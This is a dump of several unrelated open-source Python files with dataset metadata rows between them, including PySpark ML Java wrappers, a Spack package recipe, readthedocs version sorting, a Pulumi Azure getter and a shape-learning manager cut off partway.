from pyspark.ml.common import inherit_doc, _java2py, _py2java
if TYPE_CHECKING:
from pyspark.ml._typing import ParamMap
from py4j.java_gateway import JavaObject, JavaClass
T = TypeVar("T")
JW = TypeVar("JW", bound="JavaWrapper")
JM = TypeVar("JM", bound="JavaTransformer")
JP = TypeVar("JP", bound="JavaParams")
class JavaWrapper:
"""
Wrapper class for a Java companion object
"""
def __init__(self, java_obj: Optional["JavaObject"] = None):
super(JavaWrapper, self).__init__()
self._java_obj = java_obj
def __del__(self) -> None:
if SparkContext._active_spark_context and self._java_obj is not None:
SparkContext._active_spark_context._gateway.detach( # type: ignore[union-attr]
self._java_obj
)
@classmethod
def _create_from_java_class(cls: Type[JW], java_class: str, *args: Any) -> JW:
"""
Construct this object from given Java classname and arguments
"""
java_obj = JavaWrapper._new_java_obj(java_class, *args)
return cls(java_obj)
def _call_java(self, name: str, *args: Any) -> Any:
m = getattr(self._java_obj, name)
sc = SparkContext._active_spark_context
assert sc is not None
java_args = [_py2java(sc, arg) for arg in args]
return _java2py(sc, m(*java_args))
@staticmethod
def _new_java_obj(java_class: str, *args: Any) -> "JavaObject":
"""
Returns a new Java object.
"""
sc = SparkContext._active_spark_context
assert sc is not None
java_obj = _jvm()
for name in java_class.split("."):
java_obj = getattr(java_obj, name)
java_args = [_py2java(sc, arg) for arg in args]
return java_obj(*java_args)
@staticmethod
def _new_java_array(pylist: List[Any], java_class: "JavaClass") -> "JavaObject":
"""
Create a Java array of given java_class type. Useful for
calling a method with a Scala Array from Python with Py4J.
If the param pylist is a 2D array, then a 2D java array will be returned.
The returned 2D java array is a square, non-jagged 2D array that is big
enough for all elements. The empty slots in the inner Java arrays will
be filled with null to make the non-jagged 2D array.
Parameters
----------
pylist : list
Python list to convert to a Java Array.
java_class : :py:class:`py4j.java_gateway.JavaClass`
Java class to specify the type of Array. Should be in the
form of sc._gateway.jvm.* (sc is a valid Spark Context).
Example primitive Java classes:
- basestring -> sc._gateway.jvm.java.lang.String
- int -> sc._gateway.jvm.java.lang.Integer
- float -> sc._gateway.jvm.java.lang.Double
- bool -> sc._gateway.jvm.java.lang.Boolean
Returns
-------
:py:class:`py4j.java_collections.JavaArray`
Java Array of converted pylist.
"""
sc = SparkContext._active_spark_context
assert sc is not None
assert sc._gateway is not None
java_array = None
if len(pylist) > 0 and isinstance(pylist[0], list):
# If pylist is a 2D array, then a 2D java array will be created.
# The 2D array is a square, non-jagged 2D array that is big enough for all elements.
inner_array_length = 0
for i in range(len(pylist)):
inner_array_length = max(inner_array_length, len(pylist[i]))
java_array = sc._gateway.new_array(java_class, len(pylist), inner_array_length)
for i in range(len(pylist)):
for j in range(len(pylist[i])):
java_array[i][j] = pylist[i][j]
else:
java_array = sc._gateway.new_array(java_class, len(pylist))
for i in range(len(pylist)):
java_array[i] = pylist[i]
return java_array
@inherit_doc
class JavaParams(JavaWrapper, Params, metaclass=ABCMeta):
"""
Utility class to help create wrapper classes from Java/Scala
implementations of pipeline components.
"""
#: The param values in the Java object should be
#: synced with the Python wrapper in fit/transform/evaluate/copy.
def _make_java_param_pair(self, param: Param[T], value: T) -> "JavaObject":
"""
Makes a Java param pair.
"""
sc = SparkContext._active_spark_context
assert sc is not None and self._java_obj is not None
param = self._resolveParam(param)
java_param = self._java_obj.getParam(param.name)
java_value = _py2java(sc, value)
return java_param.w(java_value)
def _transfer_params_to_java(self) -> None:
"""
Transforms the embedded params to the companion Java object.
"""
assert self._java_obj is not None
pair_defaults = []
for param in self.params:
if self.isSet(param):
pair = self._make_java_param_pair(param, self._paramMap[param])
self._java_obj.set(pair)
if self.hasDefault(param):
pair = self._make_java_param_pair(param, self._defaultParamMap[param])
pair_defaults.append(pair)
if len(pair_defaults) > 0:
sc = SparkContext._active_spark_context
assert sc is not None and sc._jvm is not None
pair_defaults_seq = sc._jvm.PythonUtils.toSeq(pair_defaults)
self._java_obj.setDefault(pair_defaults_seq)
def _transfer_param_map_to_java(self, pyParamMap: "ParamMap") -> "JavaObject":
"""
Transforms a Python ParamMap into a Java ParamMap.
"""
paramMap = JavaWrapper._new_java_obj("org.apache.spark.ml.param.ParamMap")
for param in self.params:
if param in pyParamMap:
pair = self._make_java_param_pair(param, pyParamMap[param])
paramMap.put([pair])
return paramMap
def _create_params_from_java(self) -> None:
"""
SPARK-10931: Temporary fix to create params that are defined in the Java obj but not here
"""
assert self._java_obj is not None
java_params = list(self._java_obj.params())
from pyspark.ml.param import Param
for java_param in java_params:
java_param_name = java_param.name()
if not hasattr(self, java_param_name):
param: Param[Any] = Param(self, java_param_name, java_param.doc())
setattr(param, "created_from_java_param", True)
setattr(self, java_param_name, param)
self._params = None # need to reset so self.params will discover new params
def _transfer_params_from_java(self) -> None:
"""
Transforms the embedded params from the companion Java object.
"""
sc = SparkContext._active_spark_context
assert sc is not None and self._java_obj is not None
for param in self.params:
if self._java_obj.hasParam(param.name):
java_param = self._java_obj.getParam(param.name)
# SPARK-14931: Only check set params back to avoid default params mismatch.
if self._java_obj.isSet(java_param):
value = _java2py(sc, self._java_obj.getOrDefault(java_param))
self._set(**{param.name: value})
# SPARK-10931: Temporary fix for params that have a default in Java
if self._java_obj.hasDefault(java_param) and not self.isDefined(param):
value = _java2py(sc, self._java_obj.getDefault(java_param)).get()
self._setDefault(**{param.name: value})
def _transfer_param_map_from_java(self, javaParamMap: "JavaObject") -> "ParamMap":
"""
Transforms a Java ParamMap into a Python ParamMap.
"""
sc = SparkContext._active_spark_context
assert sc is not None
paramMap = dict()
for pair in javaParamMap.toList():
param = pair.param()
if self.hasParam(str(param.name())):
paramMap[self.getParam(param.name())] = _java2py(sc, pair.value())
return paramMap
@staticmethod
def _empty_java_param_map() -> "JavaObject":
"""
Returns an empty Java ParamMap reference.
"""
return _jvm().org.apache.spark.ml.param.ParamMap()
def _to_java(self) -> "JavaObject":
"""
Transfer this instance's Params to the wrapped Java object, and return the Java object.
Used for ML persistence.
Meta-algorithms such as Pipeline should override this method.
Returns
-------
py4j.java_gateway.JavaObject
Java object equivalent to this instance.
"""
self._transfer_params_to_java()
return self._java_obj
@staticmethod
def _from_java(java_stage: "JavaObject") -> "JP":
"""
Given a Java object, create and return a Python wrapper of it.
Used for ML persistence.
Meta-algorithms such as Pipeline should override this method as a classmethod.
"""
def __get_class(clazz: str) -> Type[JP]:
"""
Loads Python class from its name.
"""
parts = clazz.split(".")
module = ".".join(parts[:-1])
m = __import__(module)
for comp in parts[1:]:
m = getattr(m, comp)
return m
stage_name = java_stage.getClass().getName().replace("org.apache.spark", "pyspark")
# Generate a default new instance from the stage_name class.
py_type = __get_class(stage_name)
if issubclass(py_type, JavaParams):
# Load information from java_stage to the instance.
py_stage = py_type()
py_stage._java_obj = java_stage
# SPARK-10931: Temporary fix so that persisted models would own params from Estimator
if issubclass(py_type, JavaModel):
py_stage._create_params_from_java()
py_stage._resetUid(java_stage.uid())
py_stage._transfer_params_from_java()
elif hasattr(py_type, "_from_java"):
py_stage = py_type._from_java(java_stage)
else:
raise NotImplementedError(
"This Java stage cannot be loaded into Python currently: %r" % stage_name
)
return py_stage
def copy(self: "JP", extra: Optional["ParamMap"] = None) -> "JP":
"""
Creates a copy of this instance with the same uid and some
extra params. This implementation first calls Params.copy and
then make a copy of the companion Java pipeline component with
extra params. So both the Python wrapper and the Java pipeline
component get copied.
Parameters
----------
extra : dict, optional
Extra parameters to copy to the new instance
Returns
-------
:py:class:`JavaParams`
Copy of this instance
"""
if extra is None:
extra = dict()
that = super(JavaParams, self).copy(extra)
if self._java_obj is not None:
that._java_obj = self._java_obj.copy(self._empty_java_param_map())
that._transfer_params_to_java()
return that
def clear(self, param: Param) -> None:
"""
Clears a param from the param map if it has been explicitly set.
"""
assert self._java_obj is not None
super(JavaParams, self).clear(param)
java_param = self._java_obj.getParam(param.name)
self._java_obj.clear(java_param)
@inherit_doc
class JavaEstimator(JavaParams, Estimator[JM], metaclass=ABCMeta):
"""
Base class for :py:class:`Estimator`s that wrap Java/Scala
implementations.
"""
@abstractmethod
def _create_model(self, java_model: "JavaObject") -> JM:
"""
Creates a model from the input Java model reference.
"""
raise NotImplementedError()
def _fit_java(self, dataset: DataFrame) -> "JavaObject":
"""
Fits a Java model to the input dataset.
Examples
--------
dataset : :py:class:`pyspark.sql.DataFrame`
input dataset
Returns
-------
py4j.java_gateway.JavaObject
fitted Java model
"""
assert self._java_obj is not None
self._transfer_params_to_java()
return self._java_obj.fit(dataset._jdf)
def _fit(self, dataset: DataFrame) -> JM:
java_model = self._fit_java(dataset)
model = self._create_model(java_model)
return self._copyValues(model)
@inherit_doc
class JavaTransformer(JavaParams, Transformer, metaclass=ABCMeta):
"""
Base class for :py:class:`Transformer`s that wrap Java/Scala
implementations. Subclasses should ensure they have the transformer Java object
available as _java_obj.
"""
def _transform(self, dataset: DataFrame) -> DataFrame:
assert self._java_obj is not None
self._transfer_params_to_java()
return DataFrame(self._java_obj.transform(dataset._jdf), dataset.sparkSession)
@inherit_doc
class JavaModel(JavaTransformer, Model, metaclass=ABCMeta):
"""
Base class for :py:class:`Model`s that wrap Java/Scala
implementations. Subclasses should inherit this class before
param mix-ins, because this sets the UID from the Java model.
"""
def __init__(self, java_model: Optional["JavaObject"] = None):
"""
Initialize this instance with a Java model object.
Subclasses should call this constructor, initialize params,
and then call _transfer_params_from_java.
This instance can be instantiated without specifying java_model,
it will be assigned after that, but this scenario only used by
:py:class:`JavaMLReader` to load models. This is a bit of a
hack, but it is easiest since a proper fix would require
MLReader (in pyspark.ml.util) to depend on these wrappers, but
these wrappers depend on pyspark.ml.util (both directly and via
other ML classes).
"""
super(JavaModel, self).__init__(java_model)
if java_model is not None:
# SPARK-10931: This is a temporary fix to allow models to own params
# from estimators. Eventually, these params should be in models through
# using common base classes between estimators and models.
self._create_params_from_java()
self._resetUid(java_model.uid())
def __repr__(self) -> str:
return self._call_java("toString")
@inherit_doc
class JavaPredictor(Predictor, JavaEstimator[JM], _PredictorParams, Generic[JM], metaclass=ABCMeta):
"""
(Private) Java Estimator for prediction tasks (regression and classification).
"""
pass
@inherit_doc
class JavaPredictionModel(PredictionModel[T], JavaModel, _PredictorParams):
"""
(Private) Java Model for prediction tasks (regression and classification).
"""
@property # type: ignore[misc]
@since("2.1.0")
def numFeatures(self) -> int:
"""
Returns the number of features the model was trained on. If unknown, returns -1
"""
return self._call_java("numFeatures")
@since("3.0.0")
def predict(self, value: T) -> float:
"""
Predict label for the given features.
"""
return self._call_java("predict", value)
| 36.502155
| 100
| 0.635355
|
7f941fca30c1a0a3d5339d17399d5f6b02ee7591
| 1,648
|
py
|
Python
|
package/spack-makedepend/package.py
|
ctuning/ck-spack
|
307934efce1be2d4f104251275c82fbc70127105
|
[
"BSD-3-Clause"
] | 1
|
2018-07-17T07:45:09.000Z
|
2018-07-17T07:45:09.000Z
|
package/spack-makedepend/package.py
|
ctuning/ck-spack
|
307934efce1be2d4f104251275c82fbc70127105
|
[
"BSD-3-Clause"
] | null | null | null |
package/spack-makedepend/package.py
|
ctuning/ck-spack
|
307934efce1be2d4f104251275c82fbc70127105
|
[
"BSD-3-Clause"
] | null | null | null |
##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Makedepend(AutotoolsPackage):
"""makedepend - create dependencies in makefiles."""
homepage = "http://cgit.freedesktop.org/xorg/util/makedepend"
url = "https://www.x.org/archive/individual/util/makedepend-1.0.5.tar.gz"
version('1.0.5', 'efb2d7c7e22840947863efaedc175747')
depends_on('xproto@7.0.17:', type='build')
depends_on('pkgconfig', type='build')
| 43.368421
| 82
| 0.677184
|
2a7cffa5bdde7eb035b96c0139d4982abce2f926
| 4,146
|
py
|
Python
|
readthedocs/projects/version_handling.py
|
nikhilgondane/RTD
|
f7926c45386f793f797f927363daed6a559a0a96
|
[
"MIT"
] | 1
|
2021-02-23T23:32:35.000Z
|
2021-02-23T23:32:35.000Z
|
readthedocs/projects/version_handling.py
|
nikhilgondane/RTD
|
f7926c45386f793f797f927363daed6a559a0a96
|
[
"MIT"
] | null | null | null |
readthedocs/projects/version_handling.py
|
nikhilgondane/RTD
|
f7926c45386f793f797f927363daed6a559a0a96
|
[
"MIT"
] | 6
|
2019-02-13T16:08:41.000Z
|
2020-03-12T14:17:14.000Z
|
# -*- coding: utf-8 -*-
"""Project version handling."""
from __future__ import (
absolute_import, division, print_function, unicode_literals)
import unicodedata
import six
from packaging.version import InvalidVersion, Version
from readthedocs.builds.constants import (
LATEST_VERBOSE_NAME, STABLE_VERBOSE_NAME, TAG)
def parse_version_failsafe(version_string):
"""
Parse a version in string form and return Version object.
If there is an error parsing the string, ``None`` is returned.
:param version_string: version as string object (e.g. '3.10.1')
:type version_string: str or unicode
:returns: version object created from a string object
:rtype: packaging.version.Version
"""
if not isinstance(version_string, six.text_type):
uni_version = version_string.decode('utf-8')
else:
uni_version = version_string
try:
normalized_version = unicodedata.normalize('NFKD', uni_version)
ascii_version = normalized_version.encode('ascii', 'ignore')
final_form = ascii_version.decode('ascii')
return Version(final_form)
except (UnicodeError, InvalidVersion):
return None
def comparable_version(version_string):
"""
Can be used as ``key`` argument to ``sorted``.
The ``LATEST`` version shall always beat other versions in comparison.
``STABLE`` should be listed second. If we cannot figure out the version
number then we sort it to the bottom of the list.
:param version_string: version as string object (e.g. '3.10.1' or 'latest')
:type version_string: str or unicode
:returns: a comparable version object (e.g. 'latest' -> Version('99999.0'))
:rtype: packaging.version.Version
"""
comparable = parse_version_failsafe(version_string)
if not comparable:
if version_string == LATEST_VERBOSE_NAME:
comparable = Version('99999.0')
elif version_string == STABLE_VERBOSE_NAME:
comparable = Version('9999.0')
else:
comparable = Version('0.01')
return comparable
def sort_versions(version_list):
"""
Take a list of Version models and return a sorted list.
:param version_list: list of Version models
:type version_list: list(readthedocs.builds.models.Version)
:returns: sorted list in descending order (latest version first) of versions
:rtype: list(tupe(readthedocs.builds.models.Version,
packaging.version.Version))
"""
versions = []
for version_obj in version_list:
version_slug = version_obj.verbose_name
comparable_version = parse_version_failsafe(version_slug)
if comparable_version:
versions.append((version_obj, comparable_version))
return list(
sorted(
versions,
key=lambda version_info: version_info[1],
reverse=True,
))
def highest_version(version_list):
"""
Return the highest version for a given ``version_list``.
:rtype: tupe(readthedocs.builds.models.Version, packaging.version.Version)
"""
versions = sort_versions(version_list)
if versions:
return versions[0]
return (None, None)
def determine_stable_version(version_list):
"""
Determine a stable version for version list.
:param version_list: list of versions
:type version_list: list(readthedocs.builds.models.Version)
:returns: version considered the most recent stable one or ``None`` if there
is no stable version in the list
:rtype: readthedocs.builds.models.Version
"""
versions = sort_versions(version_list)
versions = [(version_obj, comparable)
for version_obj, comparable in versions
if not comparable.is_prerelease]
if versions:
# We take preference for tags over branches. If we don't find any tag,
# we just return the first branch found.
for version_obj, comparable in versions:
if version_obj.type == TAG:
return version_obj
version_obj, comparable = versions[0]
return version_obj
return None
| 30.940299
| 80
| 0.678003
|
e506913b0c22a84006e647058636fe08a7cb894b
| 1,178
|
py
|
Python
|
official/nlp/tasks/__init__.py
|
KiryanovKD/models
|
e17080247e3c9b3301680f61b8f4815c22509e7e
|
[
"Apache-2.0"
] | 4
|
2019-11-02T14:47:46.000Z
|
2022-01-14T10:43:02.000Z
|
official/nlp/tasks/__init__.py
|
KiryanovKD/models
|
e17080247e3c9b3301680f61b8f4815c22509e7e
|
[
"Apache-2.0"
] | 6
|
2021-10-05T18:53:55.000Z
|
2022-03-29T21:37:00.000Z
|
official/nlp/tasks/__init__.py
|
KiryanovKD/models
|
e17080247e3c9b3301680f61b8f4815c22509e7e
|
[
"Apache-2.0"
] | 2
|
2021-11-30T21:50:03.000Z
|
2022-03-27T01:27:31.000Z
|
# Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""TensorFlow Models NLP Tasks."""
# pylint: disable=g-multiple-import
from official.nlp.tasks.electra_task import ElectraPretrainConfig, ElectraPretrainTask
from official.nlp.tasks.masked_lm import MaskedLMConfig, MaskedLMTask
from official.nlp.tasks.question_answering import QuestionAnsweringConfig, QuestionAnsweringTask
from official.nlp.tasks.sentence_prediction import SentencePredictionConfig, SentencePredictionTask
from official.nlp.tasks.tagging import TaggingConfig, TaggingTask
from official.nlp.tasks.translation import TranslationConfig, TranslationTask
| 51.217391
| 99
| 0.816638
|
69ab7e50b0f60af7c79a4e1da9dafbfb7bd41af7
| 10,170
|
py
|
Python
|
sdk/python/pulumi_azure_native/compute/v20210701/get_virtual_machine_scale_set_vm_extension.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/compute/v20210701/get_virtual_machine_scale_set_vm_extension.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/compute/v20210701/get_virtual_machine_scale_set_vm_extension.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'GetVirtualMachineScaleSetVMExtensionResult',
'AwaitableGetVirtualMachineScaleSetVMExtensionResult',
'get_virtual_machine_scale_set_vm_extension',
]
@pulumi.output_type
class GetVirtualMachineScaleSetVMExtensionResult:
"""
Describes a VMSS VM Extension.
"""
def __init__(__self__, auto_upgrade_minor_version=None, enable_automatic_upgrade=None, force_update_tag=None, id=None, instance_view=None, name=None, protected_settings=None, provisioning_state=None, publisher=None, settings=None, suppress_failures=None, type=None, type_handler_version=None):
if auto_upgrade_minor_version and not isinstance(auto_upgrade_minor_version, bool):
raise TypeError("Expected argument 'auto_upgrade_minor_version' to be a bool")
pulumi.set(__self__, "auto_upgrade_minor_version", auto_upgrade_minor_version)
if enable_automatic_upgrade and not isinstance(enable_automatic_upgrade, bool):
raise TypeError("Expected argument 'enable_automatic_upgrade' to be a bool")
pulumi.set(__self__, "enable_automatic_upgrade", enable_automatic_upgrade)
if force_update_tag and not isinstance(force_update_tag, str):
raise TypeError("Expected argument 'force_update_tag' to be a str")
pulumi.set(__self__, "force_update_tag", force_update_tag)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if instance_view and not isinstance(instance_view, dict):
raise TypeError("Expected argument 'instance_view' to be a dict")
pulumi.set(__self__, "instance_view", instance_view)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if protected_settings and not isinstance(protected_settings, dict):
raise TypeError("Expected argument 'protected_settings' to be a dict")
pulumi.set(__self__, "protected_settings", protected_settings)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if publisher and not isinstance(publisher, str):
raise TypeError("Expected argument 'publisher' to be a str")
pulumi.set(__self__, "publisher", publisher)
if settings and not isinstance(settings, dict):
raise TypeError("Expected argument 'settings' to be a dict")
pulumi.set(__self__, "settings", settings)
if suppress_failures and not isinstance(suppress_failures, bool):
raise TypeError("Expected argument 'suppress_failures' to be a bool")
pulumi.set(__self__, "suppress_failures", suppress_failures)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
if type_handler_version and not isinstance(type_handler_version, str):
raise TypeError("Expected argument 'type_handler_version' to be a str")
pulumi.set(__self__, "type_handler_version", type_handler_version)
@property
@pulumi.getter(name="autoUpgradeMinorVersion")
def auto_upgrade_minor_version(self) -> Optional[bool]:
"""
Indicates whether the extension should use a newer minor version if one is available at deployment time. Once deployed, however, the extension will not upgrade minor versions unless redeployed, even with this property set to true.
"""
return pulumi.get(self, "auto_upgrade_minor_version")
@property
@pulumi.getter(name="enableAutomaticUpgrade")
def enable_automatic_upgrade(self) -> Optional[bool]:
"""
Indicates whether the extension should be automatically upgraded by the platform if there is a newer version of the extension available.
"""
return pulumi.get(self, "enable_automatic_upgrade")
@property
@pulumi.getter(name="forceUpdateTag")
def force_update_tag(self) -> Optional[str]:
"""
How the extension handler should be forced to update even if the extension configuration has not changed.
"""
return pulumi.get(self, "force_update_tag")
@property
@pulumi.getter
def id(self) -> str:
"""
Resource Id
"""
return pulumi.get(self, "id")
@property
@pulumi.getter(name="instanceView")
def instance_view(self) -> Optional['outputs.VirtualMachineExtensionInstanceViewResponse']:
"""
The virtual machine extension instance view.
"""
return pulumi.get(self, "instance_view")
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the extension.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="protectedSettings")
def protected_settings(self) -> Optional[Any]:
"""
The extension can contain either protectedSettings or protectedSettingsFromKeyVault or no protected settings at all.
"""
return pulumi.get(self, "protected_settings")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> str:
"""
The provisioning state, which only appears in the response.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def publisher(self) -> Optional[str]:
"""
The name of the extension handler publisher.
"""
return pulumi.get(self, "publisher")
@property
@pulumi.getter
def settings(self) -> Optional[Any]:
"""
Json formatted public settings for the extension.
"""
return pulumi.get(self, "settings")
@property
@pulumi.getter(name="suppressFailures")
def suppress_failures(self) -> Optional[bool]:
"""
Indicates whether failures stemming from the extension will be suppressed (Operational failures such as not connecting to the VM will not be suppressed regardless of this value). The default is false.
"""
return pulumi.get(self, "suppress_failures")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="typeHandlerVersion")
def type_handler_version(self) -> Optional[str]:
"""
Specifies the version of the script handler.
"""
return pulumi.get(self, "type_handler_version")
class AwaitableGetVirtualMachineScaleSetVMExtensionResult(GetVirtualMachineScaleSetVMExtensionResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetVirtualMachineScaleSetVMExtensionResult(
auto_upgrade_minor_version=self.auto_upgrade_minor_version,
enable_automatic_upgrade=self.enable_automatic_upgrade,
force_update_tag=self.force_update_tag,
id=self.id,
instance_view=self.instance_view,
name=self.name,
protected_settings=self.protected_settings,
provisioning_state=self.provisioning_state,
publisher=self.publisher,
settings=self.settings,
suppress_failures=self.suppress_failures,
type=self.type,
type_handler_version=self.type_handler_version)
def get_virtual_machine_scale_set_vm_extension(expand: Optional[str] = None,
instance_id: Optional[str] = None,
resource_group_name: Optional[str] = None,
vm_extension_name: Optional[str] = None,
vm_scale_set_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetVirtualMachineScaleSetVMExtensionResult:
"""
Describes a VMSS VM Extension.
:param str expand: The expand expression to apply on the operation.
:param str instance_id: The instance ID of the virtual machine.
:param str resource_group_name: The name of the resource group.
:param str vm_extension_name: The name of the virtual machine extension.
:param str vm_scale_set_name: The name of the VM scale set.
"""
__args__ = dict()
__args__['expand'] = expand
__args__['instanceId'] = instance_id
__args__['resourceGroupName'] = resource_group_name
__args__['vmExtensionName'] = vm_extension_name
__args__['vmScaleSetName'] = vm_scale_set_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:compute/v20210701:getVirtualMachineScaleSetVMExtension', __args__, opts=opts, typ=GetVirtualMachineScaleSetVMExtensionResult).value
return AwaitableGetVirtualMachineScaleSetVMExtensionResult(
auto_upgrade_minor_version=__ret__.auto_upgrade_minor_version,
enable_automatic_upgrade=__ret__.enable_automatic_upgrade,
force_update_tag=__ret__.force_update_tag,
id=__ret__.id,
instance_view=__ret__.instance_view,
name=__ret__.name,
protected_settings=__ret__.protected_settings,
provisioning_state=__ret__.provisioning_state,
publisher=__ret__.publisher,
settings=__ret__.settings,
suppress_failures=__ret__.suppress_failures,
type=__ret__.type,
type_handler_version=__ret__.type_handler_version)
| 43.836207
| 297
| 0.682104
|
83859def4b5902c74a467c5a41907327a46060b4
| 1,931
|
py
|
Python
|
app/sortPlayers.py
|
velociraptordino/CapitalsProject
|
bfbaeafd81b8a89dba0e992ec54e3e2b314b30e3
|
[
"MIT"
] | null | null | null |
app/sortPlayers.py
|
velociraptordino/CapitalsProject
|
bfbaeafd81b8a89dba0e992ec54e3e2b314b30e3
|
[
"MIT"
] | 1
|
2021-06-02T00:46:48.000Z
|
2021-06-02T00:46:48.000Z
|
app/sortPlayers.py
|
velociraptordino/CapitalsProject
|
bfbaeafd81b8a89dba0e992ec54e3e2b314b30e3
|
[
"MIT"
] | null | null | null |
"""
File: sort.py
Editor: Tiffany Nguyen
Date: December 7, 2019
Section: 01
Email: tn4@umbc.edu
Description: This file contains the function getPlayers() which reads in
the player database into a list data structure and returns it
Program Assumptions:
- Data including first name, last name, special, number, position, shoots,
height, and weight are stored in a database for the roster for all of
the 2019 players.
"""
DEFENSE_POSITION = "D"
GOALIE_POSITION = "G"
from app.model import Player
def getPlayers():
'''
goes through the soup and stores individual players' data in a dictionary;
the dictionaries are all stored in a list
: param: None
: return: playerDictionary; dictionary formatted as follows:
{ “offense”: [ [player-1-info] , . . . , [player-n-info] ],
“defense”: [ [player-1-info] , . . . , [player-n-info] ],
goalies”: [ [player-1-info] , . . . , [player-n-info] ] }
Preconditions: database with player information has already been created
Postconditions: a dictionary of containing players grouped by position
is returned
'''
# query database for all players
players = Player.query.all()
# initalize player dictionary
playerDictionary = {"offense": [], "defense": [], "goalies": []}
for player in players:
# store player's data into a list
playerData = [player.firstName, player.lastName, player.special,\
player.number,player.position, player.shoots, \
player.height, player.weight]
# add the player's data to the appropriate list based on their position
if player.position == DEFENSE_POSITION:
playerDictionary["defense"].append(playerData)
elif player.position == GOALIE_POSITION:
playerDictionary["goalies"].append(playerData)
else:
playerDictionary["offense"].append(playerData)
return playerDictionary
| 37.134615
| 79
| 0.673744
|
208415751659cccaa6d79590ae25cc890a35ae86
| 12,244
|
py
|
Python
|
src/shape_learning/shape_learner_manager.py
|
chili-epfl/shape_learning
|
dbebefce21f25a8ab5fa3525e463e53bbc5d65f2
|
[
"ISC"
] | 2
|
2015-04-23T18:38:33.000Z
|
2015-05-02T21:31:56.000Z
|
src/shape_learning/shape_learner_manager.py
|
chili-epfl/shape_learning
|
dbebefce21f25a8ab5fa3525e463e53bbc5d65f2
|
[
"ISC"
] | null | null | null |
src/shape_learning/shape_learner_manager.py
|
chili-epfl/shape_learning
|
dbebefce21f25a8ab5fa3525e463e53bbc5d65f2
|
[
"ISC"
] | 4
|
2015-01-12T12:52:54.000Z
|
2018-07-05T01:22:03.000Z
|
#!/usr/bin/env python
"""
Manages a collection of shape_learners, with long-term memory about the
history of previous collections seen. An example is managing shape_learners
which represent letters, and the collections represent words.
"""
import logging; shapeLogger = logging.getLogger("shape_logger")
import os.path
from shape_learning.shape_learner import ShapeLearner
from recordtype import recordtype # for mutable namedtuple (dict might also work)
boundExpandingAmount = 0.
usePrevParamsWhenShapeReappears = True
Shape = recordtype('Shape', [('path', None), ('shapeID', None), ('shapeType', None), ('shapeType_code', None),
('paramsToVary', None), ('paramValues', None)])
def configure_logging(path):
if path:
if os.path.isdir(path):
path = os.path.join(path, "shapes.log")
handler = logging.FileHandler(path)
handler.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
handler.setFormatter(formatter)
else:
handler = logging.NullHandler()
shapeLogger.addHandler(handler)
shapeLogger.setLevel(logging.DEBUG)
# ##--------------------------------------------- WORD LEARNING FUNCTIONS
class ShapeLearnerManager:
def __init__(self, generateSettingsFunction, shapes_logging_path = "shapes.log"):
configure_logging(shapes_logging_path)
shapeLogger.info("**************** NEW SESSION ***************")
self.generateSettings = generateSettingsFunction
self.shapesLearnt = []
self.shapeLearners_all = []
self.shapeLearners_currentCollection = []
self.settings_shapeLearners_all = []
self.settings_shapeLearners_currentCollection = []
self.shapeLearnersSeenBefore_currentCollection = []
self.currentCollection = ""
self.collectionsLearnt = []
self.nextShapeLearnerToBeStarted = 0
def initialiseShapeLearners(self):
self.shapeLearners_currentCollection = []
self.settings_shapeLearners_currentCollection = []
self.shapeLearnersSeenBefore_currentCollection = []
for i in range(len(self.currentCollection)):
